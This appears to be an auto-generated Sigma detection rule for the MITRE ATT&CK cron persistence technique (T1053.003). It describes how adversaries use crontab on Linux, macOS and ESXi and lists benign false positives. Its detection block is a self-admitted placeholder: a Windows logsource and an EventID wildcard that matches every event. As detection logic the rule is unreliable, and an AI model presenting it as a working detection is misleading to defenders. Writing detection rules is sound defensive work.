title: Cron (T1053.003)
id: df00tech-t1053-003
status: experimental
description: "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Adversaries use cron in Linux, macOS, and ESXi environments to execute programs at system startup or on a scheduled basis for persistence, privilege escalation, or execution. Real-world malware families including Kinsing, Skidmap, GoldMax, NKAbuse, Rocke, and Anchor have all leveraged cron for persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root)."
references:
  - https://attack.mitre.org/techniques/T1053/003/
  - https://df00tech.com/detections/T1053.003
author: df00tech
date: 2026/04/17
tags:
  - attack.t1053.003
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "System administrators legitimately scheduling maintenance tasks (log rotation, backups, updates) via crontab"
  - "Configuration management tools (Ansible, Chef, Puppet, SaltStack) writing cron jobs as part of authorized playbook execution"
  - "Software packages that install cron jobs during setup (e.g., package manager hooks, monitoring agents like Datadog, Prometheus node_exporter)"
  - DevOps pipelines and CI/CD systems that schedule deployment or cleanup tasks using cron
  - "Database maintenance jobs (MySQL, PostgreSQL) installed by DBAs using crontab"
level: high